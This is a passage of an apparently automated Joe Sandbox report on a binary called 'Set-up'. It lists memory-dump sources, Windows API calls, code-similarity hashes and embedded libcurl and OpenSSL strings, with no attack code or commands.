                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 8a1feb3f52a8ddda10c8d21e07e7210b069e45cebec40274f4aad65408140a70
                                      • Instruction ID: a26d4698417c351a7b6170e8fdea8e291436912169b38ea7f6f1d3b774f0f1fc
                                      • Opcode Fuzzy Hash: 8a1feb3f52a8ddda10c8d21e07e7210b069e45cebec40274f4aad65408140a70
                                      • Instruction Fuzzy Hash: CFE08C34A00200D7DE209A18C888B4B7B6B7FC0710F29CA69E02C8A250C73ACC42C602
                                      APIs
                                      • ioctlsocket.WS2_32(?,8004667E), ref: 005767FB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: ioctlsocket
                                      • String ID:
                                      • API String ID: 3577187118-0
                                      • Opcode ID: e1f8c91a2cf31c07ab4627cb4d95ad7c8ff800b642e14a80fdd621263c0d7760
                                      • Instruction ID: 84b43c39a7f7e7767fc0196a0ffc12cb09a7612f14def10652e78ce0a3339867
                                      • Opcode Fuzzy Hash: e1f8c91a2cf31c07ab4627cb4d95ad7c8ff800b642e14a80fdd621263c0d7760
                                      • Instruction Fuzzy Hash: 30C012F5208200EFC7085B24D849B5E77E9EB48255F01441CB047C2150DB749450CF16
                                      APIs
                                        • Part of subcall function 005CA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA499
                                        • Part of subcall function 005CA440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA4FB
                                        • Part of subcall function 005CA440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005CAA19
                                        • Part of subcall function 005C9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,005C92A4,?,?,?,?,?,?,?,?,00000000), ref: 005C9B6E
                                        • Part of subcall function 005C9B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,005C4860,00000000), ref: 005C9C24
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 005C93C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: AdaptersAddressesgetenv$Openmemcpy
                                      • String ID:
                                      • API String ID: 1905038125-0
                                      • Opcode ID: 32b26e668ecae6de4a025921707042a60719f69a8a3c38c54212a7df6b75bd6e
                                      • Instruction ID: ff75a1a35bc0e0e10f999d98ab613b2d35014a6317f84f62e7ea532067d4f243
                                      • Opcode Fuzzy Hash: 32b26e668ecae6de4a025921707042a60719f69a8a3c38c54212a7df6b75bd6e
                                      • Instruction Fuzzy Hash: B751C4719043429FDB14DFA4D889B2ABFE0BF84744F08052DF84583651E731E864C782
                                      APIs
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006C72D8,00000000,?,?,006C72D8,00000001,00000000,00000000,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000), ref: 006EC9FA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 48bd2789eb4a1aa4232f2c3f33a09b8e1928cb2864c088c55fb556c0d90ca667
                                      • Instruction ID: 2d12757950d08887b6bedd12e4bbd9c6dae35305933f04f02d8fbe507b38b2dd
                                      • Opcode Fuzzy Hash: 48bd2789eb4a1aa4232f2c3f33a09b8e1928cb2864c088c55fb556c0d90ca667
                                      • Instruction Fuzzy Hash: 07012BA67063D12BD62096AA7C86F9F17CADBD1730F18043DF904D2343D65598499176
                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,009BB9F0,?,?,?,?,?,009BB371), ref: 009C0621
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
                                      • Instruction ID: 392988841fb1725e92808131fef898d7516e1cd90097dca8d81bd199b1b86579
                                      • Opcode Fuzzy Hash: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
                                      • Instruction Fuzzy Hash: F0D0A771904309CFCB007E5888C150A3398BAA5314FC4055CDD849B742D7359514CBC3
                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,006C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,006C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006ECBD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 03d00744cccb0195c85fdeb29e3c5646062b90311961c77265dbda542f29f244
                                      • Instruction ID: f07b3c16c9b2b575bcf3460134605e7eaa8ac8e69b8616c5ff99b6829f1c6129
                                      • Opcode Fuzzy Hash: 03d00744cccb0195c85fdeb29e3c5646062b90311961c77265dbda542f29f244
                                      • Instruction Fuzzy Hash: 3CB092AA909280EBFA066A09B893C2B7652F690720F980821F505C59B1DA219C16E983
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: da51679177561965cb7843f00dd78e3202e64db6bc7a2e286ca744164354a97e
                                      • Instruction ID: 9231302a43076b18fc9702266fc46ed234a5e95316f907474054dfcf00087d6b
                                      • Opcode Fuzzy Hash: da51679177561965cb7843f00dd78e3202e64db6bc7a2e286ca744164354a97e
                                      • Instruction Fuzzy Hash: F1C04CB5C1464047D700BF38D64A21DBAE47B49204FC10E68E98595195F738D3188653
                                      APIs
                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00586E74
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00586F8A
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00587184
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00587263
                                      • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 005875B8
                                        • Part of subcall function 006DF870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 006DF8AE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmpmemsetstrcpystrlen
                                      • String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
                                      • API String ID: 838718518-248801092
                                      • Opcode ID: 4c4839ec930244d4ac24b9323c11f7ebd5d5c6ad38e1bfd6d28716659da79cfb
                                      • Instruction ID: ccde5355403253fafed9e6e5e0f88f2326ba9a1902f3f97802a0db8594543516
                                      • Opcode Fuzzy Hash: 4c4839ec930244d4ac24b9323c11f7ebd5d5c6ad38e1bfd6d28716659da79cfb
                                      • Instruction Fuzzy Hash: F80329B5904345ABE720BA109C46B7B7B99BF94308F08482CFD4D66293FB75EA14C793
                                      APIs
                                      • localeconv.MSVCRT ref: 0089E0B3
                                      • localeconv.MSVCRT ref: 0089E0BE
                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0089E149
                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0089E179
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E1D8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E1FA
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089E20F
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0089F886
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: free$isspacelocaleconv$_errno
                                      • String ID: $d$nil)
                                      • API String ID: 577766270-394766432
                                      • Opcode ID: da12185a3ad2f3ed3f6661a58f06188013cb9c1348c848796238c5ff28226d76
                                      • Instruction ID: e24f9541369aac9a477d24009d18d40cb2110f617728626abac16975163bd7c5
                                      • Opcode Fuzzy Hash: da12185a3ad2f3ed3f6661a58f06188013cb9c1348c848796238c5ff28226d76
                                      • Instruction Fuzzy Hash: 621359706083458FDB24EF28C48062ABBE1FF9A754F28492DE995DB361D771EC45CB82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                                      • API String ID: 0-1921080684
                                      • Opcode ID: 9ac3eb4e883c7b16a5c565f44bffe18d468417c7942c3c2be98e071b8aed4568
                                      • Instruction ID: 234aeb6b23d900ea1fd3b770c0b74cab2c47467a0eb69983b5e052f93bfcf72f
                                      • Opcode Fuzzy Hash: 9ac3eb4e883c7b16a5c565f44bffe18d468417c7942c3c2be98e071b8aed4568
                                      • Instruction Fuzzy Hash: C652F2716043019BD7189B24DC5AB6B7FE9FF94306F08486AFC8587292E731DE49C7A2
                                      APIs
                                      • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 0051E6F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: fputc
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 1992160199-2555271450
                                      • Opcode ID: ac6bfa5fda1b57edfad15e19f8ef9d6dee72e7af30df3e3314a80fbf3b406702
                                      • Instruction ID: 29ed66a577d346f7c52a37912abf010b22232abd70aebd346f9ff7ed0d03d83b
                                      • Opcode Fuzzy Hash: ac6bfa5fda1b57edfad15e19f8ef9d6dee72e7af30df3e3314a80fbf3b406702
                                      • Instruction Fuzzy Hash: E7828F71A083419FE714CE18C88576ABBE1FFC5324F188A2DF9A997291D770DC85CB52
                                      APIs
                                        • Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2
                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 005252A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
